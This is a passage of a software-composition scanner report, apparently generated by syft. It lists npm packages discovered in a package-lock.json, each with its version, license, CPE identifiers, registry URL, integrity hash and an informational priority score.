purl: pkg:npm/emoji-regex@10.6.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-10.6.0.tgz
|
|
integrity: sha512-toUI84YS5YmxW219erniWD0CIVOo46xGKColeNQRgOzDorgBi1v4D71/OFzgD9GO2UGKIv1C3Sp8DAn0+j5w7A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 40ac25fe3302f6ab
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: emoji-regex 8.0.0'
|
|
title: emoji-regex 8.0.0
|
|
description: 'Package discovered: emoji-regex 8.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6d4a27855f2a5940
|
|
name: emoji-regex
|
|
version: 8.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:emoji-regex:emoji-regex:8.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji-regex:emoji_regex:8.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji_regex:emoji-regex:8.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji_regex:emoji_regex:8.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji:emoji-regex:8.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji:emoji_regex:8.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/emoji-regex@8.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz
|
|
integrity: sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2e49a0ba02ec88d9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: emoji-regex 9.2.2'
|
|
title: emoji-regex 9.2.2
|
|
description: 'Package discovered: emoji-regex 9.2.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6d104925e5745212
|
|
name: emoji-regex
|
|
version: 9.2.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:emoji-regex:emoji-regex:9.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji-regex:emoji_regex:9.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji_regex:emoji-regex:9.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji_regex:emoji_regex:9.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji:emoji-regex:9.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji:emoji_regex:9.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/emoji-regex@9.2.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz
|
|
integrity: sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: dd09559c2dcfbb7e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: encodeurl 2.0.0'
|
|
title: encodeurl 2.0.0
|
|
description: 'Package discovered: encodeurl 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c88c25f6c6e59773
|
|
name: encodeurl
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:encodeurl:encodeurl:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/encodeurl@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz
|
|
integrity: sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: aefcf9a0415c9a67
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: end-of-stream 1.4.5'
|
|
title: end-of-stream 1.4.5
|
|
description: 'Package discovered: end-of-stream 1.4.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2e1781643534e89c
|
|
name: end-of-stream
|
|
version: 1.4.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:end-of-stream:end-of-stream:1.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:end-of-stream:end_of_stream:1.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:end_of_stream:end-of-stream:1.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:end_of_stream:end_of_stream:1.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:end-of:end-of-stream:1.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:end-of:end_of_stream:1.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:end_of:end-of-stream:1.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:end_of:end_of_stream:1.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:end:end-of-stream:1.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:end:end_of_stream:1.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/end-of-stream@1.4.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz
|
|
integrity: sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==
|
|
dependencies:
|
|
once: ^1.4.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8a726054b0a99ad6
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: engine.io 6.6.7'
|
|
title: engine.io 6.6.7
|
|
description: 'Package discovered: engine.io 6.6.7'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 560e37438ce30be1
|
|
name: engine.io
|
|
version: 6.6.7
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:socket:engine.io:6.6.7:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/engine.io@6.6.7
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/engine.io/-/engine.io-6.6.7.tgz
|
|
integrity: sha512-DgOngfDKM2EviOH3Mr9m7ks1q8roetLy/IMmYthAYzbpInMbYc/GS+fWFA3rl1gvwKVsQrVV61fo5emD1y3OJQ==
|
|
dependencies:
|
|
'@types/cors': ^2.8.12
|
|
'@types/node': '>=10.0.0'
|
|
'@types/ws': ^8.5.12
|
|
accepts: ~1.3.4
|
|
base64id: 2.0.0
|
|
cookie: ~0.7.2
|
|
cors: ~2.8.5
|
|
debug: ~4.4.1
|
|
engine.io-parser: ~5.2.1
|
|
ws: ~8.18.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 765ac1332452cd05
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: engine.io-client 6.6.4'
|
|
title: engine.io-client 6.6.4
|
|
description: 'Package discovered: engine.io-client 6.6.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 930ef4784cebfb4a
|
|
name: engine.io-client
|
|
version: 6.6.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:socket:engine.io-client:6.6.4:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/engine.io-client@6.6.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/engine.io-client/-/engine.io-client-6.6.4.tgz
|
|
integrity: sha512-+kjUJnZGwzewFDw951CDWcwj35vMNf2fcj7xQWOctq1F2i1jkDdVvdFG9kM/BEChymCH36KgjnW0NsL58JYRxw==
|
|
dependencies:
|
|
'@socket.io/component-emitter': ~3.1.0
|
|
debug: ~4.4.1
|
|
engine.io-parser: ~5.2.1
|
|
ws: ~8.18.3
|
|
xmlhttprequest-ssl: ~2.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b2a7fb31422c2427
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: engine.io-parser 5.2.3'
|
|
title: engine.io-parser 5.2.3
|
|
description: 'Package discovered: engine.io-parser 5.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b307d9bc2f957b2d
|
|
name: engine.io-parser
|
|
version: 5.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:engine.io-parser:engine.io-parser:5.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:engine.io-parser:engine.io_parser:5.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:engine.io_parser:engine.io-parser:5.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:engine.io_parser:engine.io_parser:5.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:engine.io:engine.io-parser:5.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:engine.io:engine.io_parser:5.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/engine.io-parser@5.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.2.3.tgz
|
|
integrity: sha512-HqD3yTBfnBxIrbnM1DoD6Pcq8NECnh8d4As1Qgh0z5Gg3jRRIqijury0CL3ghu/edArpUYiYqQiDUQBIs4np3Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6de5b5b314bb1d48
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: entities 4.5.0'
|
|
title: entities 4.5.0
|
|
description: 'Package discovered: entities 4.5.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3c365deec0186b44
|
|
name: entities
|
|
version: 4.5.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-2-Clause
|
|
spdxExpression: BSD-2-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:entities:entities:4.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/entities@4.5.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/entities/-/entities-4.5.0.tgz
|
|
integrity: sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9ebfe3f940205a55
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: es-define-property 1.0.1'
|
|
title: es-define-property 1.0.1
|
|
description: 'Package discovered: es-define-property 1.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 198a07fe3b41a7bb
|
|
name: es-define-property
|
|
version: 1.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:es-define-property:es-define-property:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es-define-property:es_define_property:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_define_property:es-define-property:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_define_property:es_define_property:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es-define:es-define-property:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es-define:es_define_property:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_define:es-define-property:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_define:es_define_property:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es:es-define-property:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es:es_define_property:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/es-define-property@1.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz
|
|
integrity: sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ce987dda52f0c354
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: es-errors 1.3.0'
|
|
title: es-errors 1.3.0
|
|
description: 'Package discovered: es-errors 1.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 524e10cb2d7467ea
|
|
name: es-errors
|
|
version: 1.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:es-errors:es-errors:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es-errors:es_errors:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_errors:es-errors:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_errors:es_errors:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es:es-errors:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es:es_errors:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/es-errors@1.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz
|
|
integrity: sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8e3c7c80273d6fd7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: es-object-atoms 1.1.1'
|
|
title: es-object-atoms 1.1.1
|
|
description: 'Package discovered: es-object-atoms 1.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fa7ef7424a021d69
|
|
name: es-object-atoms
|
|
version: 1.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:es-object-atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es-object-atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_object_atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_object_atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es-object:es-object-atoms:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es-object:es_object_atoms:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_object:es-object-atoms:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_object:es_object_atoms:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es:es-object-atoms:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es:es_object_atoms:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/es-object-atoms@1.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz
|
|
